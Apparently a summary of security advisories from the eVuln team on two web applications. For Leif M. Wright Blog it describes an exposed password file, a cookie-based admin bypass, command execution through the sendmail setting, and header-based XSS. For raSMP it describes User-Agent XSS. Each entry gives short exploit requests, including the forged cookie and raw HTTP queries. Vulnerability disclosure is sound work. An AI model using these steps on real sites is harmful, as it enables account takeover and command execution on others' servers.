Recent Useragent XSS vulnerabilities
Here is short summary of recent Useragent XSS vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.
Multiple flaws in Leif M. Wright Blog.
Description.
All "txt" files isn't protected by htaccess(or any other ways) in default installiation. This can be used to retrieve administrator's password from config file.
"blog.cgi" script dont make password comparisson when identifying administrator by cookie.
Administrator has an ability to edit blog configuration including full path to sendmail program. This can be used to execute arbitrary shell commands.
System access is possible.
Environment variables HTTP_REFERER and HTTP_USER_AGENT are not properly sanitized. This can be used to post HTTP query with fake Referer or User-Agent values which may contain arbitrary html or script code. This code will be executed when administrator will open "Log" page.
Exploit.
Url example:
http://[host]/cgi-bin/blog/blogconfig.txt
Cookie: blogAdmin=true
Sendmail: /bin/ls
GET /cgi-bin/blog/blog.cgi HTTP/1.0
Host: [host]
Referer: [XSS]
User-Agent: [XSS]
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
file=15-13.59.39.txt&year=2006&month=February&name=zz&comment=zzz&submit=Enter%20my%20comment
Solution
Solution is not available.
Other details >>UserAgent XSS Vulnerability in raSMP.
Description.
Vulnerable scripts:
- common.php
- common/functions.php
- admin/stats.php
Variable $_SERVER['HTTP_USER_AGENT'] isn't properly sanitized. This can be used to post HTTP query with fake User-Agent value which may contain arbitrary html or script code. This code will be executed when administrator will open Site Statistics.
Administrator's authentication is threatened.
Exploit.
HTTP query:
GET /path/index.php HTTP/1.0
Host: rasmphost
User-Agent: <XSS>
Solution.
No patch availabve.
Edit source code. Variable $_SERVER['HTTP_USER_AGENT'] needs additional sanitation.
Other details >>